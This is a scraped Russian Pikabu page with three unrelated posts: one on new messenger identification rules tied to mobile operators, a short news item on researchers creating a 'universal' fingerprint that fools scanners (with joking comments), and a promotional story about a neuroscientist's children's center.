Коротко: https://pikabu.ru/story/ocherednyie_poleznyie_predlozheniya_... и https://pikabu.ru/story/utverzhdenyi_pravila_identifikatsii_...

UPD: Если кому не понятно - помимо деанонимизации теперь возможность общаться в мессенджерах напрямую зависит от оператора сотовой связи, который может утерять или повредить хранимую в БД информацию о вас или не дать ответ на запрос мессенджера в течении 20-ти минут по техническим, либо иным причинам.

Что думаете?

Показать полностью 2
2393

Современный взлом сканера отпечатков пальцев

Группа специалистов создали "универсальный" отпечаток пальца содержащий закономерности, типичные для многих людей.


Комментарии:

- Пальцы теперь можно не отрубать?

- Теперь необязательно отрубать пальцы именно у владельца смартфона. Достаточно иметь связку из десятка отрубленных пальцев с наиболее типичными фрагментами отпечатков.


Источник: http://www.opennet.ru/opennews/art.shtml?num=46539

Чем глубже изучаешь мозг, тем больше возникает вопросов. Истории успеха, достойные «Горячего» на Пикабу #3

Чем глубже изучаешь мозг, тем больше возникает вопросов. Истории успеха, достойные «Горячего» на Пикабу #3

Вячеслав Лебедев – сотрудник и аспирант МГУ им. М.В. Ломоносова. При знакомстве с трудами нейроученых понял, что мозг – целая вселенная внутри человека, и при более глубоком его изучении возникает еще больше вопросов. Вячеслав создал центр нейрофизиологической немедикаментозной помощи детям NeuroFuture, где уже несколько лет занимается развитием внимания и концентрации у детей.


Такие истории успеха вдохновляют, заставляют искать профессию мечты и посвящать свою жизнь тому, что любишь.

Отличная работа, все прочитано!